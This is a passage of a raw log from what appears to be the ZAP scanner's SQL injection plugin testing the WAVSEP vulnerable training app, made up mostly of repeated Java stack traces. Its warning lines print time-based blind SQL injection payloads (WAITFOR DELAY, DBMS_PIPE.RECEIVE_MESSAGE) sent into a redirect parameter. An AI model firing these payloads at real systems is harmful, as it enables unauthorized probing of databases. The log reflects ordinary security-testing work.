org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682132 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682132 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('vXcW'='vXcW] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('vXcW'='vXcW at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682133 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682134 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(77)||CHR(109)||CHR(72),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(77)||CHR(109)||CHR(72),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682135 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(70)||CHR(99)||CHR(116),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(70)||CHR(99)||CHR(116),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682136 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(104)||CHR(76)||CHR(69),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(104)||CHR(76)||CHR(69),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682137 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'ncTo'='ncTo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'ncTo'='ncTo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682137 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(87)||CHR(100)||CHR(106),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(87)||CHR(100)||CHR(106),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682139 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682139 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(78)||CHR(112)||CHR(114),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(78)||CHR(112)||CHR(114),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682140 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- nOBb] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- nOBb at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682141 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(82)||CHR(88)||CHR(118),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(82)||CHR(88)||CHR(118),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at 